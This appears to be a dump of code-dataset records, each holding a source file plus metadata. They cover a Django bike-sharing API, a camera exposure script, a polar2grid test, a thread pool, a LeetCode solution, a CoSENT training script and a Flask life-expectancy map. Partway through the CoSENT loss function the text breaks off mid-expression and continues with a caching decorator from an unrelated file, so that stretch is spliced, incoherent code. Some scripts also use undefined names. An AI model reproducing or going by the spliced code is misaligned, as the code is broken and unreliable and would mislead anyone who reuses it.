CykelLogEntry.objects.order_by(\"-timestamp\").all()\n\n\ndef custom_exception_handler(exc, context):\n response = exception_handler(exc, context)\n if response is None:\n return None\n\n headers = {}\n if isinstance(exc, exceptions.APIException):\n if getattr(exc, \"auth_header\", None):\n headers[\"WWW-Authenticate\"] = exc.auth_header\n\n errors = []\n if getattr(exc, \"detail\", None):\n if isinstance(exc.detail, list):\n errors.append({\"detail\": exc.detail})\n elif isinstance(exc.detail, dict):\n for key, value in exc.detail.items():\n if isinstance(value, list):\n for item in value:\n errors.append({\"detail\": item, \"source\": key})\n else:\n errors.append({\"detail\": value, \"source\": key})\n else:\n errors.append({\"detail\": exc.detail})\n else:\n errors.append({\"detail\": str(exc)})\n\n messages = []\n for item in errors:\n if getattr(item[\"detail\"], \"code\", None):\n item[\"code\"] = item[\"detail\"].code\n messages.append(item[\"detail\"])\n\n data = {\"errors\": errors, \"message\": \"\\n\".join(messages)}\n return Response(data, status=response.status_code, headers=headers)\n", "repo_name": "transportkollektiv/cykel", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 13786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 80, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 46, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 46, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.objects.all", "line_number": 47, "usage_type": "call"}, {"api_name": "bikesharing.models.Bike.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 47, "usage_type": "name"}, {"api_name": "serializers.BikeSerializer", "line_number": 48, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 51, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 51, "usage_type": "name"}, {"api_name": "bikesharing.models.Station.objects.all", "line_number": 52, "usage_type": "call"}, {"api_name": "bikesharing.models.Station.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Station", "line_number": 52, "usage_type": "name"}, {"api_name": "serializers.StationSerializer", "line_number": 53, "usage_type": "name"}, {"api_name": "rest_framework.permissions.BasePermission", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.permissions.SAFE_METHODS", "line_number": 65, "usage_type": "name"}, {"api_name": "rest_framework.permissions.BasePermission", "line_number": 71, "usage_type": "name"}, {"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 84, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 84, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 85, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 85, "usage_type": "name"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 86, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 86, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 87, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 87, "usage_type": "name"}, {"api_name": "serializers.CreateRentSerializer", "line_number": 91, "usage_type": "name"}, {"api_name": "serializers.RentSerializer", "line_number": 93, "usage_type": "name"}, {"api_name": "bikesharing.models.Rent.objects.filter", "line_number": 97, "usage_type": "call"}, {"api_name": "bikesharing.models.Rent.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Rent", "line_number": 97, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 101, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.State", "line_number": 106, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 106, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.objects.create", "line_number": 111, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 111, "usage_type": "name"}, {"api_name": "serializers.RentSerializer", "line_number": 118, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 120, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 121, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 121, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 132, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_PERMISSON_DENIED", "line_number": 134, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 134, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 137, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_410_GONE", "line_number": 138, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 138, "usage_type": "name"}, {"api_name": "bikesharing.models.Location.objects.create", "line_number": 143, "usage_type": "call"}, {"api_name": "bikesharing.models.Location.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Location", "line_number": 143, "usage_type": "name"}, {"api_name": "bikesharing.models.Location.Source", "line_number": 145, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Location", "line_number": 145, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 146, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Point", "line_number": 147, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 152, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 124, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 159, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_PERMISSON_DENIED", "line_number": 161, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 161, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 165, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_410_GONE", "line_number": 166, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 166, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 173, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 175, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 154, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 82, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 82, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 183, "usage_type": "call"}, {"api_name": "bikesharing.models.LocationTracker.objects.get", "line_number": 185, "usage_type": "call"}, {"api_name": "bikesharing.models.LocationTracker.objects", "line_number": 185, "usage_type": "attribute"}, {"api_name": "bikesharing.models.LocationTracker", "line_number": 185, "usage_type": "name"}, {"api_name": "bikesharing.models.LocationTracker.DoesNotExist", "line_number": 186, "usage_type": "attribute"}, {"api_name": "bikesharing.models.LocationTracker", "line_number": 186, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 187, "usage_type": "call"}, {"api_name": "serializers.LocationTrackerUpdateSerializer", "line_number": 189, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 191, "usage_type": "call"}, {"api_name": "bikesharing.models.Location", "line_number": 201, "usage_type": "call"}, {"api_name": "bikesharing.models.Location.Source", "line_number": 202, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Location", "line_number": 202, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 203, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Point", "line_number": 205, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 215, "usage_type": "call"}, {"api_name": "preferences.preferences.BikeSharePreferences", "line_number": 220, "usage_type": "attribute"}, {"api_name": "preferences.preferences", "line_number": 220, "usage_type": "name"}, {"api_name": "bikesharing.models.Station.objects.filter", "line_number": 221, "usage_type": "call"}, {"api_name": "bikesharing.models.Station.objects", "line_number": 221, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Station", "line_number": 221, "usage_type": "name"}, {"api_name": "django.contrib.gis.measure.D", "line_number": 222, "usage_type": "call"}, {"api_name": "bikesharing.models.Station.Status", "line_number": 223, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Station", "line_number": 223, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 232, "usage_type": "call"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 232, "usage_type": "call"}, {"api_name": "bikesharing.models.LocationTracker.Status", "line_number": 237, "usage_type": "attribute"}, {"api_name": "bikesharing.models.LocationTracker", "line_number": 237, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.create_unless_time", "line_number": 239, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 239, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.State", "line_number": 243, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 243, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.create_unless_time", "line_number": 245, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 245, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 253, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 255, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 178, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 179, "usage_type": "call"}, {"api_name": "rest_framework_api_key.permissions.HasAPIKey", "line_number": 179, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ViewSet", "line_number": 262, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 262, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.objects.filter", "line_number": 265, "usage_type": "call"}, {"api_name": "bikesharing.models.Bike.objects", "line_number": 265, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 265, "usage_type": "name"}, {"api_name": "serializers.MaintenanceBikeSerializer", "line_number": 266, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 267, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 263, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 269, "usage_type": "call"}, {"api_name": "rest_framework.decorators.authentication_classes", "line_number": 258, "usage_type": "call"}, {"api_name": "rest_framework.authentication.SessionAuthentication", "line_number": 259, "usage_type": "name"}, {"api_name": "rest_framework.authentication.TokenAuthentication", "line_number": 259, "usage_type": "name"}, {"api_name": "authentication.BasicTokenAuthentication", "line_number": 259, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 261, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 261, "usage_type": "name"}, {"api_name": "rest_framework.generics.RetrieveAPIView", "line_number": 275, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 275, "usage_type": "name"}, {"api_name": "serializers.UserDetailsSerializer", "line_number": 282, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 283, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 283, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 291, "usage_type": "call"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 296, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 296, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 297, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 297, "usage_type": "name"}, {"api_name": "serializers.SocialAppSerializer", "line_number": 301, "usage_type": "name"}, {"api_name": "allauth.socialaccount.models.SocialApp.objects.filter", "line_number": 304, "usage_type": "call"}, {"api_name": "allauth.socialaccount.models.SocialApp.objects", "line_number": 304, "usage_type": "attribute"}, {"api_name": "allauth.socialaccount.models.SocialApp", "line_number": 304, "usage_type": "name"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 304, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 294, "usage_type": "call"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 294, "usage_type": "name"}, {"api_name": "django.utils.feedgenerator.Rss201rev2Feed", "line_number": 307, "usage_type": "name"}, {"api_name": "django.utils.feedgenerator.Rss201rev2Feed", "line_number": 309, "usage_type": "argument"}, {"api_name": "django.contrib.syndication.views.Feed", "line_number": 352, "usage_type": "name"}, {"api_name": "preferences.preferences.BikeSharePreferences", "line_number": 356, "usage_type": "attribute"}, {"api_name": "preferences.preferences", "line_number": 356, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 362, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry._meta", "line_number": 364, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 364, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.objects.order_by", "line_number": 368, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects", "line_number": 368, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 368, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 373, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 398, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects.order_by", "line_number": 406, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects", "line_number": 406, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 406, "usage_type": "name"}, {"api_name": "rest_framework.views.exception_handler", "line_number": 410, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.APIException", "line_number": 415, "usage_type": "attribute"}, {"api_name": "rest_framework.exceptions", "line_number": 415, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 442, "usage_type": "call"}]} +{"seq_id": "15514557452", "text": "import cv2 #Highly overkill I think\nfrom vimba import *\nfrom time import sleep\nimport numpy as np\nfrom PIL import Image \n\ndef take_image(cam_id, f_name): #Takes a singular picture with chosen camera and saves it as \".jpg\"\n with vimba.get_camera_by_id(cam_id) as cam:\n frame = cam.get_frame()\n frame.convert_pixel_format(PixelFormat.Mono8) #This sets the camera to use Mono8 (8-bit image [monochrome?])\n cv2.imwrite (f'{f_name}.jpg ', frame.as_opencv_image()) #Just a ludacrious way of storing the image? Seems like it\n #Ok, now lets assume this then just saves an image as a jpg\n\ndef find_exposure_time(initial_guess, cam_id): #Figures out the optimal exposure time, sets the camera to it and returns it\n exposure_time = initial_guess\n max_pixel = 256 #Just an initial value to make the while loop start\n img_name = 'for_exp_time'\n print('start')\n with vimba.get_camera_by_id(cam_id) as cam:\n increment = cam.ExposureTime.get_increment()\n while(np.abs(max_pixel-230) > 20): #Somewhat quick changes to get a fairly good exposure time\n if(max_pixel < 230): exposure_time = exposure_time + ((exposure_time*0.1)//increment)*increment #Increases exposure time ~10% but ensures that it is done in a whole number of increments\n elif(max_pixel > 230): exposure_time = exposure_time - ((exposure_time*0.1)//increment)*increment #Same as above, just lowering this time\n cam.ExposureTime.set(exposure_time)\n take_image(cam_id, img_name)\n pixel_values = np.asarray(Image.open(f'{img_name}.jpg'))\n max_pixel = np.max(pixel_values)\n print(f'rough time found: {exposure_time}')\n\n if(max_pixel < 230): #Slow and incremental changes to exposure time, so we can find the optimal one\n tmp_max_pixel = max_pixel + 1\n while(tmp_max_pixel > max_pixel and tmp_max_pixel <= 230):\n exposure_time += 1\n cam.ExposureTime.set(exposure_time)\n take_image(cam_id, img_name)\n pixel_values = np.asarray(Image.open(f'{img_name}.jpg'))\n max_pixel = np.max(pixel_values)\n exposure_time -= 1\n elif(max_pixel > 230):\n tmp_max_pixel = max_pixel - 1\n while(max_pixel > 230 and tmp_max_pixel >= 230):\n exposure_time -= 1\n cam.ExposureTime.set(exposure_time)\n take_image(cam_id, img_name)\n pixel_values = np.asarray(Image.open(f'{img_name}.jpg'))\n max_pixel = np.max(pixel_values)\n exposure_time += 1\n print(f'Optimal time found: {exposure_time}')\n cam.ExposureTime.set(exposure_time)\n return(exposure_time)\n\n\ndef main():\n with Vimba.get_instance() as vimba:\n front_camera_id = 'djlefakjlkjd' #The IDs are just placeholders as I do not know the actual IDs\n top_camera_id = 'klajsflsaj'\n\n for i in range(10): #just to check that nothing fucked happens (within a minute at least).\n print(f'test {i}: front camera is {front_camera} and top camera is {top_camera}')\n sleep(6)\n take_image(front_camera, 'test') #Takes a test image with the front camera\n\nif __name__ == '__main__':\n main()\n", "repo_name": "CThyness/Nanophotonics_II", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 3288, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "vimba.get_camera_by_id", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 11, "usage_type": "call"}, {"api_name": "vimba.get_camera_by_id", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 46, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "19653485599", "text": "import os\nfrom unittest import mock\n\nimport numpy as np\nimport pytest\n\n\ndef test_add_coastlines_help():\n from polar2grid.add_coastlines import main\n\n with pytest.raises(SystemExit) as e:\n main([\"--help\"])\n assert e.value.code == 0\n\n\ndef _create_fake_l_geotiff(fp):\n import rasterio\n\n kwargs = {\n \"driver\": \"GTiff\",\n \"height\": 1000,\n \"width\": 500,\n \"count\": 1,\n \"dtype\": np.uint8,\n \"crs\": \"+proj=latlong\",\n \"transform\": (0.033, 0.0, 0.0, 0.0, 0.033, 0.0),\n }\n with rasterio.open(fp, \"w\", **kwargs) as ds:\n ds.write(np.zeros((500, 1000), dtype=np.uint8), 1)\n\n\n@mock.patch(\"polar2grid.add_coastlines.ContourWriterAGG.add_overlay_from_dict\")\ndef test_add_coastlines_basic_l(add_overlay_mock, tmp_path):\n from polar2grid.add_coastlines import main\n\n fp = str(tmp_path / \"test.tif\")\n _create_fake_l_geotiff(fp)\n ret = main([\"--add-coastlines\", \"--add-colorbar\", fp])\n assert ret in [None, 0]\n assert os.path.isfile(tmp_path / \"test.png\")\n add_overlay_mock.assert_called_once()\n assert \"coasts\" in add_overlay_mock.call_args.args[0]\n", "repo_name": "cloudsillusions/polar2grid", "sub_path": "polar2grid/tests/test_add_coastlines.py", "file_name": "test_add_coastlines.py", "file_ext": "py", "file_size_in_byte": 1134, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.raises", "line_number": 11, "usage_type": "call"}, {"api_name": "polar2grid.add_coastlines.main", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 24, "usage_type": "attribute"}, {"api_name": "rasterio.open", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 29, "usage_type": "attribute"}, {"api_name": "polar2grid.add_coastlines.main", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 32, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "39270921333", "text": "import threading\nfrom collections.abc import Callable\nfrom queue import Queue, Empty\nfrom typing import NamedTuple, Any\n\n\nclass QueueItem(NamedTuple):\n func: Callable\n arg: Any\n\n\nclass ThreadPool:\n def __init__(self, num_threads: int):\n self.input: Queue[QueueItem] = Queue()\n self.output = Queue()\n self.running = True\n self.input_count = 0\n self.processing_count = 0\n self.output_count = 0\n self.count_lock = threading.Lock()\n\n self.threads = [threading.Thread(target=self.consumer) for _ in range(num_threads)]\n for t in self.threads:\n t.start()\n\n def __repr__(self):\n return f'ThreadPool(input_count={self.input_count}, processing_count={self.processing_count}, output_count={self.output_count})'\n\n def __len__(self):\n with self.count_lock:\n return self.input_count + self.processing_count + self.output_count\n\n def __iter__(self):\n while len(self) > 0 and self.running:\n try:\n out = self.output.get(block=True, timeout=1)\n self.output.task_done()\n with self.count_lock:\n self.output_count -= 1\n yield out\n except Empty:\n pass\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.join()\n\n def join(self):\n self.input.join()\n self.running = False\n for t in self.threads:\n t.join()\n\n def add_item(self, func, arg):\n self.input.put(QueueItem(func, arg))\n with self.count_lock:\n self.input_count += 1\n\n def get_item(self):\n out = self.output.get()\n self.output.task_done()\n with self.count_lock:\n self.output_count -= 1\n return out\n\n def consumer(self):\n while self.running:\n try:\n item = self.input.get(block=True, timeout=1)\n with self.count_lock:\n self.input_count -= 1\n self.processing_count += 1\n self.output.put(item.func(item.arg))\n self.input.task_done()\n with self.count_lock:\n self.processing_count -= 1\n self.output_count += 1\n except Empty:\n pass\n", "repo_name": "KathrynPanger/bbd", "sub_path": "src/bbd/github_data_extractor/threadpool.py", "file_name": "threadpool.py", "file_ext": "py", "file_size_in_byte": 2360, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.NamedTuple", "line_number": 7, "usage_type": "name"}, {"api_name": "collections.abc.Callable", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 9, "usage_type": "name"}, {"api_name": "queue.Queue", "line_number": 14, "usage_type": "name"}, {"api_name": "queue.Queue", "line_number": 15, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 20, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 22, "usage_type": "call"}, {"api_name": "queue.Empty", "line_number": 41, "usage_type": "name"}, {"api_name": "queue.Empty", "line_number": 80, "usage_type": "name"}]} +{"seq_id": "73982554729", "text": "#\n# @lc app=leetcode id=2218 lang=python3\n#\n# [2218] Maximum Value of K Coins From Piles\n#\n\n# @lc code=start\nfrom functools import cache\nfrom typing import List\n\n\nclass Solution:\n def maxValueOfCoins(self, piles: List[List[int]], k: int) -> int:\n @cache\n def dp(i, coin_to_collect):\n '''\n @param:\n i : choose only the pile starting from i \n '''\n if i == len(piles) or coin_to_collect == 0:\n return 0\n ret, curr = dp(i+1, coin_to_collect), 0\n\n for _i, x in enumerate(piles[i]):\n if coin_to_collect-1-_i < 0:\n break\n curr += x\n ret = max(dp(i+1, coin_to_collect-(_i + 1)) + curr, ret)\n return ret\n return dp(0, k)\n\n# @lc code=end\n", "repo_name": "benntuecon/Leetcode-prac", "sub_path": "2218.maximum-value-of-k-coins-from-piles.py", "file_name": "2218.maximum-value-of-k-coins-from-piles.py", "file_ext": "py", "file_size_in_byte": 824, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "functools.cache", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "42185950529", "text": "import os\r\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\r\nimport sys\r\nsys.path.append(\"D:/Meredith/TaskB\")\r\nimport csv\r\nimport gzip\r\nimport xml.dom.minidom\r\nimport math\r\nfrom datetime import datetime\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom sklearn.metrics.pairwise import paired_cosine_distances\r\n# from datasets import load_dataset\r\nfrom transformers import AutoTokenizer,AutoModel,BertConfig,BertModel\r\nimport numpy as np\r\n\r\nfrom transformers.models.bert import BertTokenizer\r\nfrom transformers import AdamW,get_linear_schedule_with_warmup\r\n\r\n# from sentence_transformers.evaluation import EmbeddingSimilarityEvaluator\r\nfrom typing import Union, Tuple, List, Iterable, Dict, Callable\r\nfrom data_CoSENT import load_ENdata,load_PTdata,CustomDataset,collate_fn,pad_to_maxlen\r\n\r\nfrom utils import evaluate,get_similarity,prepare_data,get_devSimilarity,write_csv,evaluate_submission,insert_to_submission1,writeList_csv,set_seed\r\nfrom torch import nn\r\n\r\n# from transformers import InputExample\r\nfrom torch.utils.data import Dataset\r\nimport random\r\nimport torch\r\nimport argparse\r\n\r\n#本部分来自https://github.com/shawroad/CoSENT_Pytorch\r\ndef calc_loss(y_true,y_pred):\r\n #取出真实标签\r\n y_true=y_true[::2]\r\n #对输出的句子向量进行l2归一化 后面只需要对应位相乘就可以得到cos值\r\n norms=(y_pred**2).sum(axis=1,keepdims=True)**0.5\r\n y_pred=y_pred/norms\r\n #奇偶向量相乘\r\n y_pred=torch.sum(y_pred[::2]*y_pred[1::2],dim=1)*20\r\n y_1=y_pred[:,None]\r\n y_2=y_pred[None,:]\r\n y_pred=y_1-y_2#两两之间的余弦差值\r\n #矩阵中的第i行第j列 表示的是第i个余弦值-第j个余弦值\r\n y_true=y_true[:,None] load it and return its content\r\n if os.path.exists(cachefile):\r\n with open(cachefile, 'rb') as cachehandle:\r\n print(\"using cached result from '%s'\" % cachefile)\r\n return pickle.load(cachehandle)\r\n\r\n # execute the function with all arguments passed\r\n res = fn(*args, **kwargs)\r\n\r\n # write to cache file\r\n with open(cachefile, 'wb') as cachehandle:\r\n print(\"saving result to cache '%s'\" % cachefile)\r\n pickle.dump(res, cachehandle)\r\n\r\n return res\r\n\r\n return wrapped\r\n\r\n return decorator # return this \"customized\" decorator that uses \"cachefile\"\r\n\r\n@cached('tracts_disparity.pickle')\r\ndef load_data():\r\n lfe = pd.read_csv('data/US_A.CSV')[['Tract ID', 'e(0)']] \\\r\n .rename(index=str, \r\n columns={'Tract ID': 'GEOID', \r\n 'e(0)':'life_expectancy'})\r\n lfe['GEOID'] = lfe['GEOID'].astype(str)\r\n gdf = gpd.read_file('data/geo/tracts/usa_tracts.shp')[['GEOID','geometry']]\r\n gdf = gdf.merge(lfe).set_index('GEOID')\r\n\r\n swm = ps.weights.Rook.from_dataframe(gdf)\r\n tract_to_neighbors = swm.neighbors\r\n\r\n fips_to_lfe = dict(zip(lfe['GEOID'].astype(str), lfe['life_expectancy']))\r\n\r\n g = nx.Graph()\r\n g.add_nodes_from(gdf.index)\r\n\r\n for tract, neighbors in tract_to_neighbors.items():\r\n avail_tracts = fips_to_lfe.keys()\r\n # some tracts don't seem to show up in the life expectancy dataset\r\n # these may be tracts with no population\r\n if tract in avail_tracts:\r\n for neighbor in neighbors:\r\n if neighbor in avail_tracts:\r\n tract_lfe = fips_to_lfe[tract]\r\n neighbor_lfe = fips_to_lfe[neighbor]\r\n disparity = abs(tract_lfe - neighbor_lfe)\r\n g.add_edge(tract, neighbor, disparity=disparity)\r\n # remove the node from the graph if the node is not in the life\r\n # expectancy dataset\r\n elif tract in g.nodes:\r\n g.remove_node(tract)\r\n\r\n sorted_list = sorted(g.edges(data=True), key=lambda x: x[2]['disparity'], reverse=True)\r\n\r\n return lfe, sorted_list, gdf\r\n\r\n\r\nlife_expectancy = Blueprint('life_expectancy', __name__, template_folder='templates')\r\n\r\n@life_expectancy.route('/folium')\r\n# read config file and return json to the client!\r\ndef get_map():\r\n limit = request.args.get('limit')\r\n lfe, sorted_list, gdf = load_data()\r\n\r\n top_50 = sorted_list[:int(limit)]\r\n top_50_tracts = []\r\n for t in top_50:\r\n if t[0] not in top_50_tracts:\r\n top_50_tracts.append(t[0])\r\n if t[1] not in top_50_tracts:\r\n top_50_tracts.append(t[1])\r\n\r\n \r\n top_50_tracts_gdf = gdf[gdf.index.isin(top_50_tracts)].reset_index()[['GEOID', 'geometry', 'life_expectancy']]\r\n top_50_tracts_gdf.to_file('selected_tracts.geojson', driver='GeoJSON')\r\n\r\n\r\n m = folium.Map(tiles='cartodbpositron', min_zoom=4, zoom_start=4.25, \r\n max_bounds=True,location=[33.8283459,-98.5794797],\r\n min_lat=5.499550, min_lon=-160.276413, \r\n max_lat=83.162102, max_lon=-52.233040)\r\n marker_cluster = MarkerCluster(\r\n options = {'maxClusterRadius':15, \r\n 'disableCusteringAtZoom':5, \r\n 'singleMarkerMode':True}).add_to(m)\r\n folium.Choropleth(\r\n geo_data = 'selected_tracts.geojson',\r\n data = lfe,\r\n columns = ['GEOID','life_expectancy'],\r\n fill_color = 'YlGn',\r\n key_on = 'feature.properties.GEOID',\r\n name = 'geojson',\r\n legend_name='Life Expectancy'\r\n ).add_to(m)\r\n\r\n for i, tract in top_50_tracts_gdf.iterrows():\r\n x = tract.geometry.centroid.x\r\n y = tract.geometry.centroid.y\r\n l = tract.life_expectancy\r\n folium.CircleMarker([y, x], radius=8, color='black', \r\n fill_color='white', fill_opacity=0.5, \r\n tooltip='Life expectancy: {}'.format(str(l))).add_to(marker_cluster)\r\n \r\n f = folium.Figure()\r\n title = '

Does your census tract determine how ' + \\\r\n 'long you will live?

'\r\n subtitle = '

